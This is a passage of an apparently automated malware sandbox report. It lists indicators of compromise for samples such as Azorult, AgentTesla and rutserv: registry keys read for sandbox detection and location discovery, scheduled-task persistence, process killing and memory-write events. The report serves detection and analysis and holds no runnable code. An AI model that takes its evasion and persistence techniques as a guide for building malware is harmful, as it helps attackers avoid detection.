description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winlogon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mabezat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Azorult.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 winit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winit.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 3956 timeout.exe 4728 timeout.exe 736 timeout.exe 3116 timeout.exe 4616 timeout.exe 2660 timeout.exe 2028 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1344 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 1616 taskkill.exe 4572 taskkill.exe 3028 taskkill.exe 4380 taskkill.exe 116 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877353842277013" chrome.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox" chrome.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Moniker = "cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104" chrome.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children chrome.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings wini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000_Classes\Local Settings R8.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 taskhostw.exe -
Runs .reg file with regedit 2 IoCs
pid Process 3472 regedit.exe 3116 regedit.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3876 schtasks.exe 3116 schtasks.exe 2536 schtasks.exe 3440 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 2932 chrome.exe 2932 chrome.exe 1648 Azorult.exe 1648 Azorult.exe 1648 Azorult.exe 1648 Azorult.exe 1648 Azorult.exe 1648 Azorult.exe 1648 Azorult.exe 1648 Azorult.exe 1648 Azorult.exe 1648 Azorult.exe 708 Azorult.exe 708 Azorult.exe 708 Azorult.exe 708 Azorult.exe 708 Azorult.exe 708 Azorult.exe 708 Azorult.exe 708 Azorult.exe 708 Azorult.exe 708 Azorult.exe 2524 rutserv.exe 2524 rutserv.exe 2524 rutserv.exe 2524 rutserv.exe 2524 rutserv.exe 2524 rutserv.exe 3144 rutserv.exe 3144 rutserv.exe 1400 rutserv.exe 1400 rutserv.exe 320 rutserv.exe 320 rutserv.exe 320 rutserv.exe 320 rutserv.exe 320 rutserv.exe 320 rutserv.exe 4912 rfusclient.exe 4912 rfusclient.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe 2312 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 5108 AgentTesla.exe 4540 taskhostw.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 4516 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe Token: SeShutdownPrivilege 3896 chrome.exe Token: SeCreatePagefilePrivilege 3896 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3896 chrome.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe 3472 taskmgr.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 1340 xpaj.exe 4284 xpaj.exe 5108 AgentTesla.exe 1648 Azorult.exe 3624 wini.exe 708 Azorult.exe 2312 winit.exe 2524 rutserv.exe 3144 rutserv.exe 1400 rutserv.exe 320 rutserv.exe 3012 cheat.exe 1372 taskhost.exe 4460 P.exe 5076 ink.exe 2932 R8.exe 1908 winlogon.exe 4540 taskhostw.exe 3032 winlogon.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3896 wrote to memory of 1700 3896 chrome.exe 86 PID 3896 wrote to memory of 1700 3896 chrome.exe 86 PID 3896 wrote to memory of 3840 3896 chrome.exe 87 PID 3896 wrote to memory of 3840 3896 chrome.exe 87 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 2792 3896 chrome.exe 88 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 PID 3896 wrote to memory of 3904 3896 chrome.exe 89 